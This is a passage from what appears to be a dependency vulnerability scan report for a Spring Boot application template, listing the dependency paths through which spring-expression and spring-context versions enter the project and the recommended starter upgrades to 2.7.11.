  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
